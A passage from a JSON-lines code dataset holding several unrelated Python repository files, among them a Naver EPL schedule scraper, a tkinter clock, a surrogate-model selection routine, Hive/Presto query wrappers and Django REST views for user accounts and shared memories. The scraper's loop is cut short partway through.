\"Cedric\",\n\t\"Ennie\": \"Joyce\",\n\t\"Maria\": \"Putini\",\n\t\"Mamorake\": \"Danny\",\n\t\"Mavis\": \"Foster\",\n\t\"Isahai\": \"Koketso\",\n\t\"Oupa\": \"keMolebetse\",\n\t\"Nathaniel\": None,\n\t\"Junior\": \"Lethabo\",\n}\n\ncities = {\n\t1: \"Johannesburg\",\n\t2: \"Cape Town\",\n\t3: \"Durban\",\n\t4: \"Germiston\",\n\t5: \"Pretoria\",\n\t6: \"Port Elizabeth\",\n\t7: \"East London\",\n\t8: \"Bloemfontein\"\n}\n\ncities[9] = \"Soweto\"\ncities[10] = \"Pietermaritzburg\"\n\nprint(\"-\"*10)\nprint(\"Lucy's firsborn is: \", states[\"Lucy\"])\nprint(\"Nathaniel's firsborn is: \", states[\"Nathaniel\"])\n\n\nprint(\"-\"*10)\nfor i, city in list(cities.items()):\n\tprint(f\"{i} has the city {city}\")\n","repo_name":"Thadishi/PythonPrac","sub_path":"learnPythonTheHardWay/states39.py","file_name":"states39.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1180920107","text":"#by forever1296\r\n#패키지 import\r\nimport requests\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\n\r\n#오늘 날짜\r\nnow_all = datetime.now()\r\nnow_want = now_all.strftime('%Y%m%d')\r\n\r\n# n,m = 월\r\nn = 0\r\nm = 1\r\ncount = 1\r\n\r\n#월 01~05 08~12 변경위한 while문\r\nwhile count!=11:\r\n # 해당 url에서 html을 불러옴.\r\n url = requests.get('https://sports.news.naver.com/wfootball/schedule/index.nhn?year=2019&month='+ str(n) + str(m) +'&category=epl?_=1528970517325')\r\n urlc = url.content\r\n html = BeautifulSoup(urlc,\"html.parser\")\r\n #저장된 html에서 find_all 함수를 이용하여 원하는 태그유형,이름을 찾음.\r\n #변수.find(\"태그명\",{\"타입\":\"찾고자하는클래스명\"}\r\n data = str(html.find_all(\"script\",{\"type\":\"text/javascript\"}))\r\n\r\n #저장이 정상적으로 되었는지 확인.\r\n #print(data)\r\n\r\n #split 구현 \"을 기준으로 구분하여 배열로 저장.\r\n sdata = data.split('\"')\r\n\r\n #split 정상적으로 되었는지 확인\r\n #print(sdata[6])\r\n\r\n #필요한 데이터 -> date / scheduleList / homeTeamName / awayTeamName / homeTeamScore / awayTeamScore / state 등\r\n i = 0\r\n rdata = list()\r\n #len(sdata) 크기 확인\r\n #print(len(sdata))\r\n\r\n #while문을 이용하여 필요한 데이터 저장\r\n while i 1~12월 / i = while문 반복횟수 -> len(sdata)\r\n","repo_name":"tegueneeeee/SportsInfoAnalysts","sub_path":"schedule_epl.py","file_name":"schedule_epl.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2040447740","text":"# from tkinter import *\n\n# from time import strftime\n\n# root = Tk()\n\n# root.title('Digital clock')\n\n# def clock():\n# \ttick = strftime('%H:%M:%S %p')\n\n# \tlabel.config(text =tick)\n\n# \tlabel.after(1000, clock)\n\n# label = Label(root, font =('sans', 80), background = 'black', foreground = 'red')\n\n# label.pack(anchor= 'center')\n\n# clock()\n# mainloop()\n\n\nfrom tkinter import *\nimport time\nroot = Tk()\nroot.title(\"Digital Clock\")\ndef clock() : \n tick = time.strftime(\"%H : %M : %S %p\")\n # tick = time.strftime(\"%X\")\n label.config(text = tick) \n label.after(1000,clock)\n\n\nlabel1 = Label(root,text = \"Digital Clock\",font = (\"arial\",20),bg = \"yellow\",fg = \"blue\")\nlabel = Label(root,font = (\"arial\",20),background = \"black\",foreground = \"red\")\nbtn=Button(root, text=\"This is Button widget\", fg='blue')\n\ntxtfld=Entry(root, text=\"This is Entry Widget\", bd=5)\n\n# label1.place(x=50,y=40)\nlabel.place(x=45,y=100)\nbtn.place(x=80, y=200)\ntxtfld.place(x=80, y=150)\nlabel1.pack()\n# label.pack()\n# btn.pack()\nclock()\nroot.configure(background=\"#00ffff\")#hexa decimal gb color values\nroot.geometry(\"400x250+300+400\")\nroot.mainloop()\n\n","repo_name":"nidhics/All_Python","sub_path":"level2 5-8/Digital clock 9/clock.py","file_name":"clock.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26021302822","text":"import copy\nimport multiprocessing\n\nimport numpy as np\nfrom joblib import Parallel, delayed\nfrom sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\nfrom .KrigingSMT import predictKriging, verifyKriging\nfrom .RBFRoy import replaceKernel, predictRoyRBFmodel, verifyRoyRBFmodel\nfrom .RandomForest import createRandomForest, predictRandomForest\nfrom .SVMSklearn import predictSVM, verifySVM\n\n\n# Do model verification\ndef ModelVerification(mixint, x, y, KrgTypes, RBFconfigs, RBFKernels, SVMconfig, RFconfig,\n fCrit, evall, time_limit=35, nCPU=None,\n nTotal=None):\n \"\"\"\n Input arguments\n mixint: mixed-integer context of SMT python package (required)\n x: the initial samples (required)\n y: the real objective values of initial samples x (required)\n ### At least one of the following models shall be specified ###\n KrgTypes: type of Kriging model, example: itertool ['constant', 'linear', 'quadratic'] × [‘abs_exp’, ‘squar_exp’, ‘act_exp’, ‘matern52’, ‘matern32’, ‘gower’]\n RBFconfigs: general RBF config, [ptail(polynomial tail), squares, smooth, Kernel]\n RBFKernels: alternative kernels for RBF model\n SVMcondig: type of SVM regression model, see defaultSVMsettings(nVar) in SVMSklearn.py (required)\n RFconfig: config for random forest (optional)\n\n fCrit: metrics to select the best model, mean squared error or mean absolute error or R squared\n Shall be a sklearn API\n evall: number of samples\n\n Optional arguments\n time_limit: the hard limit for running time\n nCPU: number of available (CPU) processes of the computer\n nTotal: number of models that survive the verification, namely, top-T\n Shall be less than nCPU or 2*nCPU depending on the hardware specifications\n\n @return: the configurations of survived models and the models themself\n KrgNewTypes, KrgNewModels, len(KrgNewTypes), RBFNewKernels, RBFNewModels, len(\n RBFNewKernels), SVMConfig, SVMModels, len(SVMConfig), RFNewConfig, RFModel, len(RFNewConfig)\n \"\"\"\n\n # If we have less than 100 samples, do not split\n # Only calculate training errors\n if x.shape[0] < 100:\n X_train = x\n X_test = x\n y_train = y\n y_test = y\n else:\n X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n # X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n\n # Initialize settings\n KrgModels = []\n RBFModels = []\n SVMNewModels = []\n SVMNewConfig = []\n RFNewConfig = []\n if nCPU is None:\n nCPU = multiprocessing.cpu_count() - 2\n if nTotal is None:\n nTotal = nCPU * 2\n nKriging = len(KrgTypes)\n nRBF = len(RBFKernels)\n nSVM = len(SVMconfig)\n nRF = len(RFconfig)\n # pool = multiprocessing.Pool(processes=nCPU)\n par = Parallel(n_jobs=nTotal)\n # print(\"Start verifying models...\")\n newKrgLoss = []\n newRBFLoss = []\n SVMNewLoss = []\n RFLoss = []\n if nKriging > 0:\n # Create all Kriging models\n KrgModels = [[] for i in range(nKriging)]\n process = [(copy.deepcopy(mixint), copy.deepcopy(X_train), copy.deepcopy(y_train), KrgTypes[modi][0],\n KrgTypes[modi][1], KrgTypes[modi][2], evall) for modi in range(nKriging)]\n KrgModels = par(delayed(verifyKriging)(p) for p in process)\n # Locate 'survived' kriging models\n KrgNonInd = [i for i, val in enumerate(KrgModels) if val is not None]\n nKriging = len(KrgNonInd)\n newKrgModels = [[] for i in range(nKriging)]\n newKrgTypes = [[] for i in range(nKriging)]\n\n for inew, iold in enumerate(KrgNonInd):\n if KrgModels[iold][1] <= time_limit:\n newKrgModels[inew] = KrgModels[iold][0]\n newKrgTypes[inew] = KrgTypes[iold]\n\n # Rank Kriging models and select top nCPU\n # nBatch = math.ceil(nKriging / nCPU)\n KrgLoss = np.empty(nKriging)\n krgResults = [[] for i in range(nKriging)]\n\n process = [(copy.deepcopy(X_test), copy.deepcopy(newKrgModels[model]), False) for model in range(nKriging)]\n # krgResults = pool.map(predictSMTKrigingModel, process)\n krgResults = par(delayed(predictKriging)(p) for p in process)\n # pool.close()\n # evaluate Kriging\n for ind, result in enumerate(krgResults):\n result = np.reshape(result, (y_test.shape[0], -1))\n KrgLoss[ind] = fCrit(y_test, result)\n if fCrit is mean_squared_error or fCrit is mean_absolute_error:\n index = np.argsort(KrgLoss)\n elif fCrit is r2_score:\n index = np.argsort(-KrgLoss)\n else:\n raise NotImplementedError\n # index = index.astype(int)\n nSize = nCPU if nKriging > nCPU else nKriging\n KrgTypes = [[] for i in range(nSize)]\n KrgModels = [[] for i in range(nSize)]\n newKrgLoss = [np.inf] * nSize\n for i in range(nSize):\n newKrgLoss[i] = KrgLoss[index[i]]\n KrgTypes[i] = newKrgTypes[index[i]]\n KrgModels[i] = newKrgModels[index[i]]\n print(\"Krigings have been verified\")\n\n # Create all RBF models\n if nRBF > 0:\n # Create all Kriging models\n RBFModels = [[] for i in range(nRBF)]\n process = [\n (copy.deepcopy(X_train), copy.deepcopy(y_train), copy.deepcopy(replaceKernel(RBFconfigs, RBFKernels, modi)),\n evall) for modi in range(nRBF)]\n # RBFModels = pool.map(createRoyRBFmodel, process)\n RBFModels = par(delayed(verifyRoyRBFmodel)(p) for p in process)\n # pool.close()\n\n RBFNonInd = [i for i, val in enumerate(RBFModels) if val is not None]\n nRBF = len(RBFNonInd)\n newRBFModels = [[] for i in range(nRBF)]\n newRBFKernels = [[] for i in range(nRBF)]\n\n for inew, iold in enumerate(RBFNonInd):\n if RBFModels[iold][1] <= time_limit:\n newRBFModels[inew] = RBFModels[iold][0]\n newRBFKernels[inew] = RBFKernels[iold]\n\n # nBatch = math.ceil(nRBF / nCPU)\n # Rank Kriging models and select top nCPU\n RBFLoss = np.empty(nRBF)\n RBFResults = [[] for i in range(nRBF)]\n process = [(copy.deepcopy(X_test), copy.deepcopy(newRBFModels[int(model)]), False) for model in range(nRBF)]\n # RBFResults = pool.map(predictRoyRBFmodel, process)\n RBFResults = par(delayed(predictRoyRBFmodel)(p) for p in process)\n\n # evaluate RBF\n for ind, result in enumerate(RBFResults):\n result = np.reshape(result, (y_test.shape[0], -1))\n RBFLoss[ind] = fCrit(y_test, result)\n\n if fCrit is mean_squared_error or fCrit is mean_absolute_error:\n index = np.argsort(RBFLoss)\n elif fCrit is r2_score:\n index = np.argsort(-RBFLoss)\n else:\n raise NotImplementedError\n nSize = nCPU if nRBF > nCPU else nRBF\n RBFKernels = [[] for i in range(nSize)]\n RBFModels = [[] for i in range(nSize)]\n newRBFLoss = [np.inf] * nSize\n for i in range(nSize):\n newRBFLoss[i] = RBFLoss[index[i]]\n RBFKernels[i] = newRBFKernels[index[i]]\n RBFModels[i] = newRBFModels[index[i]]\n print(\"RBFs have been verified\")\n\n if nSVM > 0:\n process = [\n (copy.deepcopy(X_train), copy.deepcopy(y_train.flatten()), conf[0], conf[1], conf[2], conf[3], conf[4],\n conf[5]) for conf in\n SVMconfig]\n # each process loads: X, Y, k, d, c, e, cache_size, max_iter= arguments\n SVMModels = par(delayed(verifySVM)(p) for p in process)\n process = [\n (copy.deepcopy(X_test), copy.deepcopy(model[0])) for model in SVMModels if model[1] <= time_limit]\n SVMResults = par(delayed(predictSVM)(p) for p in process)\n SVMLoss = np.empty(nSVM)\n for ind, result in enumerate(SVMResults):\n result = np.reshape(result, (y_test.shape[0], -1))\n SVMLoss[ind] = fCrit(y_test, result)\n if fCrit is mean_squared_error or fCrit is mean_absolute_error:\n index = np.argsort(SVMLoss)\n elif fCrit is r2_score:\n index = np.argsort(-SVMLoss)\n else:\n raise NotImplementedError\n nSize = nCPU if nSVM > nCPU else nSVM\n SVMNewConfig = [[] for i in range(nSize)]\n SVMNewModels = [[] for i in range(nSize)]\n SVMNewLoss = [np.inf] * nSize\n for i in range(nSize):\n SVMNewLoss[i] = SVMLoss[index[i]]\n SVMNewConfig[i] = SVMconfig[index[i]]\n SVMNewModels[i] = SVMModels[index[i]][0]\n print(\"SVMs have been verified\")\n\n if nRF > 0:\n ## We only have one RF config by default,\n ## so setting time limit for random forest is not in our consideration\n rfmodel = createRandomForest((copy.deepcopy(X_train), copy.deepcopy(y_train.flatten())))\n rfresult = predictRandomForest((copy.deepcopy(X_test), rfmodel, False))\n # rfresult = np.reshape(rfresult, (y.shape[0], -1))\n RFLoss = fCrit(y_test, rfresult)\n RFconfig = ['default']\n print(\"RF has been verified\")\n\n AllLoss = newKrgLoss + newRBFLoss + SVMNewLoss + [RFLoss]\n Allconfig = KrgTypes + RBFKernels + SVMNewConfig + RFconfig\n nKriging = len(KrgModels)\n nRBF = len(RBFModels)\n nSVM = len(SVMNewModels)\n if fCrit is mean_squared_error or fCrit is mean_absolute_error:\n index = np.argsort(AllLoss)\n index = list(index)\n elif fCrit is r2_score:\n index = np.argsort(AllLoss)\n new_index = np.flip(index)\n index = list(new_index)\n else:\n raise NotImplementedError\n nSize = nTotal if len(index) > nTotal else len(index)\n idKrg = 0\n idRBF = 0\n idSVM = 0\n RBFNewKernels = []\n RBFNewModels = []\n KrgNewTypes = []\n KrgNewModels = []\n SVMModels = []\n SVMConfig = []\n RFModel = []\n RFconfig = []\n\n for i in range(nSize):\n if index[i] < nKriging and nKriging > 0:\n KrgNewTypes.append(KrgTypes[index[i]])\n KrgNewModels.append(KrgModels[index[i]])\n idKrg += 1\n elif nKriging <= index[i] < nKriging + nRBF and nRBF > 0:\n RBFNewKernels.append(RBFKernels[index[i] - nKriging])\n RBFNewModels.append(RBFModels[index[i] - nKriging])\n idRBF += 1\n elif nKriging + nRBF <= index[i] < nKriging + nRBF + nSVM and nSVM > 0:\n SVMModels.append(SVMNewModels[index[i] - (nKriging + nRBF)])\n SVMConfig.append(SVMNewConfig[index[i] - (nKriging + nRBF)])\n idSVM += 1\n elif index[i] == nKriging + nRBF + nSVM and nRF > 0:\n RFModel = [rfmodel]\n RFNewConfig = ['default']\n nRF = 1\n\n print('Model verification is done!')\n return KrgNewTypes, KrgNewModels, len(KrgNewTypes), RBFNewKernels, RBFNewModels, len(\n RBFNewKernels), SVMConfig, SVMModels, len(SVMConfig), RFNewConfig, RFModel, len(RFNewConfig)\n","repo_name":"BaronH07/SAMA-DiEGO","sub_path":"Codes/ThesisCode/ModelVerification.py","file_name":"ModelVerification.py","file_ext":"py","file_size_in_byte":11079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72708945530","text":"# Imports the Google Cloud client library\nfrom google.cloud import language_v2\nimport pandas as pd\nimport json\nfrom tqdm import tqdm\n\n# Instantiates a client\nclient = language_v2.LanguageServiceClient()\n\npheme = pd.read_csv('datasets\\pheme2.csv')\ntwitter = pd.read_csv('datasets\\\\twitter2.csv')\nweibo = pd.read_csv('datasets\\\\weibo.csv')\n\ndef classify(text, verbose=True):\n \"\"\"Classify the input text into categories.\"\"\"\n\n language_client = language_v2.LanguageServiceClient()\n\n document = language_v2.Document(\n content=text, type_=language_v2.Document.Type.PLAIN_TEXT\n )\n response = language_client.classify_text(request={\"document\": document})\n categories = response.categories\n\n result = {}\n\n for category in categories:\n # Turn the categories into a dictionary of the form:\n # {category.name: category.confidence}, so that they can\n # be treated as a sparse vector.\n result[category.name] = category.confidence\n\n if verbose:\n print(text)\n for category in categories:\n print(\"=\" * 20)\n print(\"{:<16}: {}\".format(\"category\", category.name))\n print(\"{:<16}: {}\".format(\"confidence\", category.confidence))\n\n return result\n\ndef parse_table(table, write_file):\n results = {}\n entry_number = 0\n for text in tqdm(table):\n try:\n result = classify(text, verbose=False)\n results[entry_number] = result\n entry_number += 1\n except Exception:\n print(f\"Error processing Entry Number {entry_number}\")\n entry_number += 1\n with open(write_file, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(results, ensure_ascii=False))\n print(f\"Categorized {len(table)} entries\")\n return results\n\n#parse_table(pheme[\"text\"], \"pheme_categories.json\")\n#parse_table(twitter[\"text\"], \"twitter_categories.json\")\nparse_table(weibo[\"text\"], \"weibo_categories.json\")\n#print(twitter[\"text\"].iloc[385])\n#parse_table(twitter[\"text\"].iloc[385:387])\n\n\"\"\"\n# The text to analyze\ntext = \"Hello, world!\"\ndocument = language_v1.types.Document(\n content=text, type_=language_v1.types.Document.Type.PLAIN_TEXT\n)\n\n# Detects the sentiment of the text\nsentiment = client.analyze_sentiment(\n request={\"document\": document}\n).document_sentiment\n\nprint(f\"Text: {text}\")\nprint(f\"Sentiment: {sentiment.score}, {sentiment.magnitude}\")\"\"\"","repo_name":"WillTan14/wills-ensemble","sub_path":"categorizers/google_categorizer.py","file_name":"google_categorizer.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22111027254","text":"import decimal\nimport datetime\nimport json\n\n\nclass Hive:\n def __init__(self, host, port, database='', username=None, password=None):\n self.host = host\n self.port = port\n self.username = username\n self.password = password\n self.database = database\n self.database = database\n self.connect = self.db_connect()\n self.cs = self.connect.cursor()\n\n def db_connect(self):\n \"\"\"连接初始化\"\"\"\n from pyhive import hive\n from pyhive.exc import DatabaseError\n try:\n connect = hive.Connection(\n host=self.host,\n port=self.port,\n username=self.username,\n password=self.password\n )\n except DatabaseError as err:\n raise Exception('数据库连接错误:', err)\n\n return connect\n\n def select(self, sql):\n \"\"\"查询\"\"\"\n self.cs.execute(sql)\n data = self.cs.fetchall()\n data_list = []\n row_headers = [x[0] for x in self.cs.description]\n for result in data:\n result_list = []\n for res in result:\n if isinstance(res, datetime.datetime):\n res = res.strftime(\"%Y-%m-%d %H:%M:%S\")\n if isinstance(res, decimal.Decimal):\n res = float(res)\n result_list.append(res)\n data_list.append(dict(zip(row_headers, result_list)))\n self.close()\n return data_list\n\n def execute(self, sql):\n \"\"\"执行sql\"\"\"\n sql_check(sql)\n self.cs.execute(sql)\n self.connect.commit()\n self.close()\n\n def executemany(self, sql, *args):\n \"\"\"批量执行\"\"\"\n self.cs.executemany(sql, *args)\n self.connect.commit()\n self.close()\n\n def close(self):\n \"\"\"关闭连接\"\"\"\n self.cs.close()\n self.connect.close()\n\n\nclass PrestoDB:\n def __init__(self, host, port=9000, catalog='hive', user=None, password=None):\n self.host = host\n self.port = port\n self.user = user\n self.password = password\n self.catalog = catalog\n self.connect = self.db_connect()\n self.cs = self.connect.cursor()\n\n def db_connect(self):\n \"\"\"连接初始化\"\"\"\n try:\n connect = dbapi.connect(\n host=self.host,\n port=self.port,\n user=self.user,\n catalog=self.catalog\n )\n except exceptions.DatabaseError as err:\n raise Exception('数据库连接错误:', err)\n\n return connect\n\n def select(self, sql: str) -> list:\n \"\"\"查询\"\"\"\n sql = sql.replace('\"', \"'\")\n self.cs.execute(sql)\n data = self.cs.fetchall()\n data_list = []\n row_headers = [x[0] for x in self.cs.description]\n for result in data:\n result_list = []\n for res in result:\n if isinstance(res, datetime.datetime):\n res = res.strftime(\"%Y-%m-%d %H:%M:%S\")\n if isinstance(res, decimal.Decimal):\n res = float(res)\n result_list.append(res)\n data_list.append(dict(zip(row_headers, result_list)))\n self.close()\n return data_list\n\n def execute(self, sql):\n \"\"\"执行sql\"\"\"\n sql_check(sql)\n self.cs.execute(sql)\n self.connect.commit()\n self.close()\n\n def executemany(self, sql, *args):\n \"\"\"批量执行\"\"\"\n self.cs.executemany(sql, *args)\n self.connect.commit()\n self.close()\n\n def close(self):\n \"\"\"关闭连接\"\"\"\n self.cs.close()\n self.connect.close()\n\n\nclass DateEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, datetime.datetime):\n return obj.strftime(\"%Y-%m-%d %H:%M:%S\")\n if isinstance(obj, decimal.Decimal):\n return float(obj)\n # if isinstance(obj, str):\n # return obj.decode('utf8')\n else:\n return json.JSONEncoder.default(self, obj)\n\n\ndef sql_check(sql):\n if not any([True if i.upper() in sql.upper() else False for i in ['select', 'update', 'delete']]):\n raise RuntimeError(\"仅支持 'select', 'update', 'delete' 语句\")\n\n if 'UPDATE' in sql or 'DELETE' in sql.upper():\n if 'WHERE' not in sql.upper():\n raise RuntimeError('update, delete 语句必须包含 where 条件')\n","repo_name":"AHUsers/HTB","sub_path":"autotest/corelibs/exc_hive.py","file_name":"exc_hive.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41401248660","text":"from django.shortcuts import render\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.decorators import api_view, permission_classes\r\nfrom rest_framework.permissions import IsAuthenticated\r\nfrom django.db.models import Q\r\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\r\nfrom rest_framework_simplejwt.views import TokenObtainPairView\r\nfrom django.contrib.auth.hashers import make_password, check_password\r\nfrom rest_framework import status\r\nfrom django.core.mail import EmailMessage\r\nfrom django.conf import settings\r\nimport random\r\nfrom django.core.paginator import Paginator\r\n\r\nfrom .models import Memory, User, Image, MemorySpace\r\nfrom .serializers import MemorySerializer, UserSerializer, UserSerializerWithToken, ImageSerializer, MemoryDetailsSerializer, MemorySpaceSerializer, MemorySpaceDetailsSerializer\r\n\r\n# Create your views here.\r\n\r\n\r\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\r\n def validate(self, attrs):\r\n data = super().validate(attrs)\r\n serializer = UserSerializerWithToken(self.user).data\r\n\r\n for key, value in serializer.items():\r\n data[key] = value\r\n\r\n return data\r\n\r\n\r\nclass MyTokenObtainPairView(TokenObtainPairView):\r\n serializer_class = MyTokenObtainPairSerializer\r\n\r\n\r\n@api_view([\"POST\"])\r\ndef register(request):\r\n serializer = UserSerializerWithToken(data=request.data)\r\n\r\n try:\r\n if serializer.is_valid():\r\n user = serializer.save()\r\n user.password = make_password(user.password)\r\n user.save()\r\n\r\n try:\r\n send_email(\"welcome to never fade\", f\"Hey {user.username}, welcome to never fade\", user.email)\r\n except:\r\n pass\r\n finally:\r\n return Response({\"user\": serializer.data})\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n except:\r\n return Response({}, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef get_user_profile(request):\r\n user = User.objects.get(id=request.user.id)\r\n serializer = UserSerializerWithToken(user)\r\n return Response({\"user\": serializer.data})\r\n\r\n\r\n@api_view([\"POST\"])\r\n@permission_classes([IsAuthenticated])\r\ndef search_user(request):\r\n query = request.query_params[\"query\"].strip()\r\n\r\n if query == \"\":\r\n return Response({\"error\": \"provide a search query\"}, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n users = User.objects.filter(Q(username__icontains=query) | Q(\r\n email__icontains=query)).exclude(id=request.user.id)\r\n serializer = UserSerializer(users, many=True)\r\n\r\n return Response({\"users\": serializer.data})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef update_user(request, user_id):\r\n user = User.objects.get(id=user_id)\r\n\r\n if request.user != user:\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n try:\r\n serializer = UserSerializerWithToken(\r\n user, data=request.data, partial=True)\r\n\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response({\"user\": serializer.data})\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n except:\r\n return Response({})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef change_user_password(request, user_id):\r\n user = None\r\n\r\n try:\r\n user = User.objects.get(id=user_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user != user:\r\n return Response({\"error\": \"unathorized\"})\r\n\r\n if check_password(request.data[\"current_password\"], user.password):\r\n serializer = UserSerializerWithToken(\r\n user, data={\"password\": request.data[\"new_password\"]}, partial=True)\r\n\r\n if serializer.is_valid():\r\n user = serializer.save()\r\n user.password = make_password(request.data[\"new_password\"])\r\n user.save()\r\n return Response({\"user\": serializer.data})\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n else:\r\n return Response({\"error\": \"the current password is incorrect\"})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\ndef get_password_reset_code (request, user_email):\r\n user = None\r\n\r\n try:\r\n user = User.objects.get(email = user_email)\r\n except:\r\n return Response({ \"error\": \"not found\" }, status = 404)\r\n\r\n # reset_code = random.randint(1000, 9999)\r\n # user.reset_code = reset_code\r\n\r\n # send_email(\"reset your password\", f\"The code to reset your password is { reset_code }\", user_email)\r\n # user.save()\r\n\r\n # return Response({})\r\n\r\n try:\r\n reset_code = random.randint(1000, 9999)\r\n user.reset_code = reset_code\r\n\r\n try:\r\n send_email(\"reset your password\", f\"The code to reset your password is { reset_code }\", user_email)\r\n user.save()\r\n except:\r\n return Response({}, status = 400)\r\n\r\n return Response({})\r\n except:\r\n return Response({}, status = 400)\r\n\r\n\r\n@api_view([\"PATCH\"])\r\ndef reset_user_password (request):\r\n user = None\r\n\r\n try:\r\n try:\r\n user = User.objects.get(email = request.data.get(\"email\"))\r\n except:\r\n return Response({ \"error\": \"not found\" }, status = 404)\r\n\r\n if user.reset_code != int(request.data.get(\"reset_code\")):\r\n return Response({ \"error\": \"invalid code\" }, status = 400)\r\n \r\n serializer = UserSerializer(user, data = { \"password\": request.data.get(\"new_password\") }, partial = True)\r\n \r\n if serializer.is_valid():\r\n user.password = make_password(request.data.get(\"new_password\"))\r\n user.reset_code = None\r\n user.save()\r\n\r\n return Response({})\r\n \r\n return Response({ \"errors\": serializer.errors }, status = 400)\r\n except:\r\n return Response({}, status = 400)\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef get_memories(request):\r\n memories = None\r\n memory_space = request.query_params.get(\"memory-space\")\r\n page_number = request.query_params.get(\"page\") or 1\r\n\r\n if memory_space:\r\n memories = Memory.objects.filter(Q(memory_space=memory_space) & Q(\r\n memory_space__users__id=request.user.id))\r\n else:\r\n memories = Memory.objects.filter(\r\n owner=request.user.id).filter(memory_space=None)\r\n\r\n paginator = Paginator(memories, 5)\r\n page = paginator.get_page(page_number)\r\n serializer = MemorySerializer(page.object_list, many=True)\r\n\r\n return Response({\"memories\": serializer.data, \"has_next\": page.has_next(), \"has_prev\": page.has_previous()})\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef get_shared_memories(request):\r\n type = request.query_params[\"type\"]\r\n query = None\r\n page_number = request.query_params.get(\"page\") or 1\r\n\r\n if type == \"with me\":\r\n query = ~Q(owner=request.user.id) & Q(shared_with__id=request.user.id)\r\n elif type == \"by me\":\r\n query = Q(owner=request.user.id) & Q(shared=True)\r\n\r\n memories = Memory.objects.filter(query)\r\n paginator = Paginator(memories, 5)\r\n page = paginator.get_page(page_number)\r\n serializer = MemorySerializer(page.object_list, many=True)\r\n\r\n return Response({\"memories\": serializer.data, \"has_next\": page.has_next(), \"has_prev\": page.has_previous()})\r\n\r\n\r\n@api_view([\"POST\"])\r\n@permission_classes([IsAuthenticated])\r\ndef create_memory(request):\r\n image = request.data.get(\"images\")\r\n images = None\r\n\r\n if image:\r\n images = request.FILES.getlist(\"images\")\r\n request.data.pop(\"images\")\r\n\r\n serializer = MemorySerializer(data=request.data)\r\n\r\n if serializer.is_valid():\r\n memory = serializer.save()\r\n memory.owner = request.user\r\n\r\n if not memory.date:\r\n memory.date = memory.created_at\r\n\r\n images_to_serialize = []\r\n\r\n if images:\r\n for image in images:\r\n images_to_serialize.append({ \"image\": image, \"memory\": memory.id })\r\n\r\n image_serializer = ImageSerializer(data = images_to_serialize[:14], many = True)\r\n\r\n if image_serializer.is_valid():\r\n image_serializer.save()\r\n memory.preview = image_serializer.data[0][\"image\"][60:]\r\n else:\r\n memory.delete()\r\n return Response({\"errors\": image_serializer.errors})\r\n\r\n memory.save()\r\n\r\n return Response({\"memory\": serializer.data}, status=201)\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef get_memory_details(request, memory_id):\r\n memory = None\r\n\r\n try:\r\n memory = Memory.objects.get(id=memory_id)\r\n except:\r\n return Response({\"error\": \"not found\"}, status=404)\r\n\r\n if (memory.memory_space):\r\n if request.user not in memory.memory_space.users.all() and request.user not in list(memory.shared_with.all()):\r\n return Response({\"error\": \"unauthorized\"})\r\n else:\r\n if memory.owner != request.user and request.user not in list(memory.shared_with.all()):\r\n return Response({\"error\": \"unauthorized\"}, status=400)\r\n\r\n try:\r\n images = Image.objects.filter(memory=memory)\r\n serializer = MemoryDetailsSerializer(memory)\r\n imageSerializer = ImageSerializer(images, many=True)\r\n return Response({\"memory\": serializer.data, \"images\": imageSerializer.data})\r\n except:\r\n return Response({})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef edit_memory(request, memory_id):\r\n memory = None\r\n\r\n try:\r\n memory = Memory.objects.get(id=memory_id)\r\n except:\r\n return Response({\"error\": \"not found\"}, status=404)\r\n\r\n if memory.owner.id != request.user.id:\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n try:\r\n serializer = MemorySerializer(memory, data=request.data, partial=True)\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response({\"memory\": serializer.data})\r\n\r\n return Response({\"errors\": serializer.errors}, status=400)\r\n except:\r\n return Response({\"error\": \"memory not found\"}, status=404)\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef share_memory(request, memory_id):\r\n memory = 